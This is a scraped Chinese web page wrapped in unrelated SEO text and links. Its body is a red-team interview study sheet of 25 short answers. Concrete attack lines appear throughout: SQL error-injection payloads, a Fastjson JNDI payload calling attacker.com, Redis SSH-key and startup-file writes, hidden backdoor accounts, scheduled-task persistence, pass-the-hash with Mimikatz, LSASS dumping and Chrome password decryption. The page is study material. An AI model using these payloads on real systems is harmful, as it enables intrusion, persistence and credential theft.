当前位置: 首页 > news >正文

站长素材音效下载望城网站建设

站长素材音效下载,望城网站建设,wordpress情侣博客模板下载,台州华燕网业有限公司安全领域各种资源#xff0c;学习文档#xff0c;以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具#xff0c;欢迎关注。 目录 红队攻防工程师 1. SQL注入的报错函数 2. DOM型XSS 3. SSRF利用点 4. SQL注入点空表利用 5. MVC代码审计…安全领域各种资源学习文档以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具欢迎关注。 目录 红队攻防工程师 1. SQL注入的报错函数 2. DOM型XSS 3. SSRF利用点 4. SQL注入点空表利用 5. MVC代码审计流程 6. 挖洞实战案例 7. Redis利用姿势及环境差异 8. Fastjson回显 9. JNDI注入及原理 10. 端口389 11. Java回显技术 12. 泛微OA XStream回显差异 13. Shiro限制Payload长度 14. 文件上传白名单绕过 15. 00截断原理 16. 判断域控的几种方式 17. 工作组横向 vs 域内横向 18. Windows认证协议 19. 判断是否在域内 20. Hash传递原理 21. 权限维持技术 22. 横向移动姿势及原理 23. 凭证获取与对抗 24. 对抗杀软添加后门用户 25. Chrome密码Dump原理与工具思路 红队攻防工程师 sql注入的报错函数 dom 型 xss ssrf 利用点 sql注入点空表如何利用 mvc代码审计流程 看你简历有在挖洞说一下你挖过的洞 Redis 利用姿势及环境差异 fastjson回显 jndi注入及原理 端口 389 Java 回显 泛微oa xstream的回显(jdk1.8和1.7的差异) shiro 限制payload长度 Java回显的通用思路以及不同版本jdk的差异 文件上传白名单利用 00截断的原理 判断域控的几种方式 工作组横向 域内横向 Windows认证协议 白银票据黄金票据 判断是否在域内 hash传递原理 权限维持 横向移动的各种姿势及原理 凭证获取(姿势/常用/原理/对抗) 如何对抗杀软加后门用户 Chrome dump密码的原理如果让你写个工具思路是什么(或者别人工具的实现原理) 1. SQL注入的报错函数 核心函数 MySQLupdatexml(1,concat(0x7e,user()),1)、extractvalue(1,concat(0x7e,user()))MSSQLconvert(int,version)触发类型错误Oraclectxsys.drithsx.sn(1,(select user from dual)) 原理通过构造语法错误使数据库返回错误信息中包含敏感数据。 2. DOM型XSS 触发场景前端直接操作DOM未过滤用户输入如 javascriptdocument.write(location.hash.substring(1)); // 攻击者通过#svg onloadalert(1)触发 特点仅客户端执行无需服务器响应常见于SPA单页应用。 3. SSRF利用点 协议利用 file:///etc/passwd 读取本地文件dict://127.0.0.1:6379/info 探测Redis信息gopher:// 构造HTTP请求攻击内网服务 云元数据http://169.254.169.254/latest/meta-data/AWS密钥泄露。 4. SQL注入点空表利用 方法通过虚拟数据触发报错如 sqlUNION SELECT 1,(SELECT 1 FROM dual WHERE 1cast((SELECT version()) AS INT)),3 原理强制类型转换失败导致错误信息泄漏数据。 5. MVC代码审计流程 路由分析检查URL映射如Spring的RequestMapping是否存在未授权访问。控制器校验验证PreAuthorize等权限控制是否缺失。模型层SQL检查ORM框架MyBatis/Hibernate是否存在动态拼接。视图层XSS模板引擎Thymeleaf/JSP是否转义用户输入。第三方组件Fastjson/Shiro等版本是否存在已知漏洞。 6. 挖洞实战案例 逻辑漏洞某系统支付流程未校验订单归属导致越权支付。未授权访问API接口/api/admin/list无Token验证直接获取敏感数据。SQL注入搜索框参数keyword未过滤利用 AND 1updatexml(...) --获取管理员密码。 7. Redis利用姿势及环境差异 环境利用方式Linux写SSH公钥config set dir /root/.sshWindows写启动项C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\evil.bat 通用主从复制RCESLAVEOF指向恶意服务器 8. Fastjson回显 低版本≤1.2.24直接JNDI注入如{type:com.sun.rowset.JdbcRowSetImpl,dataSourceName:ldap://attacker.com/exp} 。高版本利用BasicDataSource构造内存马通过ClassLoader加载恶意类。 9. JNDI注入及原理 原理JNDI动态加载远程对象攻击者控制lookup()参数指向恶意RMI/LDAP服务触发远程类加载。利用链InitialContext.lookup(ldap://attacker.com/Exploit) → 加载恶意类执行RCE。 10. 端口389 用途LDAP协议默认端口用于域环境中的用户认证和目录服务。关联攻击域渗透中通过LDAP查询域用户、计算机等信息。 11. Java回显技术 通用思路 通过当前请求线程获取Response对象直接写入结果。反射调用ServletContext或HttpServletResponse输出数据。 JDK差异 JDK≤7直接使用TemplatesImpl加载字节码。JDK≥8需结合JNDI或内存马绕过限制。 12. 泛微OA XStream回显差异 JDK1.7利用java.beans.EventHandler 链直接执行命令。JDK1.8需通过TemplatesImpl加载字节码结合反射输出结果到响应流。 13. Shiro限制Payload长度 绕过方法 使用短链如CC链的简化版。分块传输rememberMepayload1; rememberMepayload2。结合内存马如注册Filter。 14. 文件上传白名单绕过 技巧 扩展名混淆.php→.php5、.phtml、.phar。.htaccess设置AddType application/x-httpd-php .jpg。内容伪造图片马修改Content-Type为image/jpeg。 15. 00截断原理 场景旧版PHP5.3.4处理文件名时遇到%00会截断后续字符。利用evil.php%00.jpg→ 服务器解析为evil.php 前提是magic_quotes_gpcOff。 16. 判断域控的几种方式 命令nltest /dclist:域名。DNS查询nslookup -typesrv _ldap._tcp.dc._msdcs. 域名。注册表HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History中的DC信息。 17. 工作组横向 vs 域内横向 场景技术工作组IPC$共享、WMI命令、PsExec、SMB协议传递。域内Kerberos票据传递黄金/白银票据、LDAP查询、GPO组策略下发。 18. Windows认证协议 NTLM基于挑战-响应易受中间人攻击Responder工具。Kerberos基于票据TGT/ST黄金票据伪造TGT需krbtgt哈希白银票据伪造ST需服务账户哈希。 19. 判断是否在域内 命令systeminfo | findstr /i Domain。注册表HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Domain。环境变量echo %USERDOMAIN%。 20. Hash传递原理 本质使用NTLM哈希代替明文密码进行身份验证Pass-the-Hash。工具Mimikatz的sekurlsa::pth或Impacket的psexec.py -hashes LMHASH:NTHASH。 21. 权限维持技术 系统级 隐藏账户net user test$ Password123 /add。计划任务schtasks /create /tn Update /tr evil.exe /sc hourly。 域控级 DSRM密码同步修改域控DSRM密码为已知值。Hook PasswordChangeNotify截取密码修改事件。 22. 横向移动姿势及原理 Pass-the-Hash直接使用哈希认证NTLM协议。Overpass-the-Hash将哈希转为Kerberos票据需域账户权限。DCOM/WMI远程执行命令如Get-WmiObject调用Win32_Process。 23. 凭证获取与对抗 常用工具 Mimikatz提取LSASS内存。Procdump导出进程内存离线解析。 对抗杀软 使用C#版Mimikatz避免特征检测。注册表注入无文件加载如reg addrundll32.exe 。 24. 对抗杀软添加后门用户 隐藏用户net user test$ Password123 /add /domain$符号隐藏。注册表克隆复制管理员RID至隐藏账户HKLM\SAM\SAM\Domains\Account\Users。无文件启动通过服务DLL或WMI订阅执行。 25. Chrome密码Dump原理与工具思路 原理 定位%LocalAppData%\Google\Chrome\User Data\Default\Login Data。解密密码字段调用CryptUnprotectData API需用户登录状态。 工具实现 Python脚本复制数据库文件→SQLite读取→调用Windows API解密。关键代码使用pywin32库的win32crypt.CryptUnprotectData()。
http://www.hkea.cn/news/14508179/

相关文章:

  • 湛江有哪些网站建设公司微信朋友圈软文大全
  • 检测网站访问量wordpress全站伪静态
  • 定远县建设小学网站重庆梁平网站建设报价
  • 深圳建站模板公司教育网站建设的目的
  • 西安网站建设罗鑫邢台123今天最新招聘
  • 网页托管网站wordpress自定义文章类别
  • 网站html下载器网站备案 多少钱
  • 天河商城网站建设苏州建网站的公司平台收费标准
  • 奖券世界推广网站在网站开发中哪里需要js文件
  • pc蛋蛋网站开发wordpress网站发布时间
  • 网站建设汽车后市场解决方案有没有专门找装修公司的网站
  • 免费跨境电商网站网站屏幕自适应代码
  • ip代理提取网站源码闸北区网站制作
  • 绵阳做最好优化网站的网站建设思路方案
  • 渭南汽车网站制作网络服务者不履行法律
  • 邯郸网站维护三大门户网站
  • 公司网站建设合规吗网络营销外包都选异变网络
  • 南昌网站建设模板技术公司wordpress上传路径
  • 增加访客的网站官网站内优化怎么做 2018
  • 代码判断网站网站备案快速备案
  • 企业网站推广渠道网站开发流程步骤
  • 临沂网站建设服务商手机怎样创建网站
  • 网站建设海淀区2021年企业所得税优惠政策最新
  • 太原seo建站免费建立一个网站
  • 网站流量评价有哪几方面办公室装修设计创意图
  • 机械设备企业网站源码软件项目管理过程五个阶段
  • 好的手机端网站模板下载安装个人网站首页怎么做
  • 广告传媒建设网站网站推广的技术有哪些
  • 做推送的网站除了秀米还有国家建设协会工程质量分会网站
  • 北京云邦网站建设做网站工作室找客户难